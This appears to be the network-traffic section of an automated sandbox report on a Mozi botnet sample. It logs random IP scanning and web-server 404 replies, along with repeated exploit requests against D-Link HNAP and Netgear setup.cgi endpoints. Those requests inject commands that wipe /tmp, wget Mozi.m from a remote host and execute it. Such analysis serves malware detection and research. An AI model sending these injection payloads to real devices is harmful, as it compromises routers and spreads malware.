                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 221.128.175.114:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.54.104.1:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 175.119.69.229:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</I
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 112.74.206.52:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.89.214.135
                            Source: unknownTCP traffic detected without corresponding DNS query: 149.185.53.154
                            Source: unknownTCP traffic detected without corresponding DNS query: 155.61.123.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 184.217.35.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 105.137.202.218
                            Source: unknownTCP traffic detected without corresponding DNS query: 99.37.65.129
                            Source: unknownTCP traffic detected without corresponding DNS query: 175.141.183.193
                            Source: unknownTCP traffic detected without corresponding DNS query: 84.60.151.77
                            Source: unknownTCP traffic detected without corresponding DNS query: 132.169.224.240
                            Source: unknownTCP traffic detected without corresponding DNS query: 207.49.85.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 101.215.138.244
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.159.89.38
                            Source: unknownTCP traffic detected without corresponding DNS query: 141.139.161.123
                            Source: unknownTCP traffic detected without corresponding DNS query: 217.128.81.132
                            Source: unknownTCP traffic detected without corresponding DNS query: 102.211.48.37
                            Source: unknownTCP traffic detected without corresponding DNS query: 190.180.20.21
                            Source: unknownTCP traffic detected without corresponding DNS query: 97.152.141.58
                            Source: unknownTCP traffic detected without corresponding DNS query: 132.35.122.63
                            Source: unknownTCP traffic detected without corresponding DNS query: 206.66.211.183
                            Source: unknownTCP traffic detected without corresponding DNS query: 41.22.25.103
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.69.78.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 79.186.143.177
                            Source: unknownTCP traffic detected without corresponding DNS query: 109.147.241.154
                            Source: unknownTCP traffic detected without corresponding DNS query: 138.58.82.192
                            Source: unknownTCP traffic detected without corresponding DNS query: 50.41.174.31
                            Source: unknownTCP traffic detected without corresponding DNS query: 205.51.46.8
                            Source: unknownTCP traffic detected without corresponding DNS query: 17.143.195.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 70.97.76.208
                            Source: unknownTCP traffic detected without corresponding DNS query: 85.233.216.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.176.243.123
                            Source: unknownTCP traffic detected without corresponding DNS query: 209.136.182.147
                            Source: unknownTCP traffic detected without corresponding DNS query: 59.17.48.95
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.127.83.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 52.176.185.219
                            Source: unknownTCP traffic detected without corresponding DNS query: 163.49.20.154
                            Source: unknownTCP traffic detected without corresponding DNS query: 34.144.108.84
                            Source: unknownTCP traffic detected without corresponding DNS query: 180.191.141.165
                            Source: unknownTCP traffic detected without corresponding DNS query: 133.183.45.107
                            Source: unknownTCP traffic detected without corresponding DNS query: 217.32.46.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 43.163.194.108
                            Source: unknownTCP traffic detected without corresponding DNS query: 55.92.128.187
                            Source: unknownTCP traffic detected without corresponding DNS query: 221.38.227.70
                            Source: unknownTCP traffic detected without corresponding DNS query: 73.227.59.34
                            Source: unknownTCP traffic detected without corresponding DNS query: 1.86.24.162
                            Source: unknownTCP traffic detected without corresponding DNS query: 117.145.177.145
                            Source: unknownTCP traffic detected without corresponding DNS query: 132.134.9.26
                            Source: unknownTCP traffic detected without corresponding DNS query: 124.193.58.88
                            Source: unknownTCP traffic detected without corresponding DNS query: 166.131.20.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 7.175.103.180
                            Source: unknownTCP traffic detected without corresponding DNS query: 207.100.187.60
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:45:14 GMTServer: Apache/2.4.51 (cPanel) OpenSSL/1.1.1l mod_bwlimited/1.4Content-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-storeContent-Type: text/html; charset=utf-8Via: 1.1 spaces-router (e3eb0c1553be)Date: Tue, 16 Nov 2021 14:46:52 GMTContent-Length: 549Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 75 63 68 20 61 70 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 2f 2f 77 77 77 2e 68 65 72 6f 6b 75 63 64 6e 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6e 6f 2d 73 75 63 68 2d 61 70 70 2e 68 74 6d 6c 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta charset="utf-8"> <title>No such app</title> <style media="screen"> html,body,iframe { margin: 0; padding: 0; } html,body { height: 100%; overflow: hidden; } iframe { width: 100%; height: 100%; border: 0; } </style> </head> <body> <iframe src="//www.herokucdn.com/error-pages/no-such-app.html"></iframe> </body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Nov 2021 14:46:58 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 207Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 65 74 75 70 2e 63 67 69 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /setup.cgi was not found on this server.</p></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 16 Nov 2021 14:47:27 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 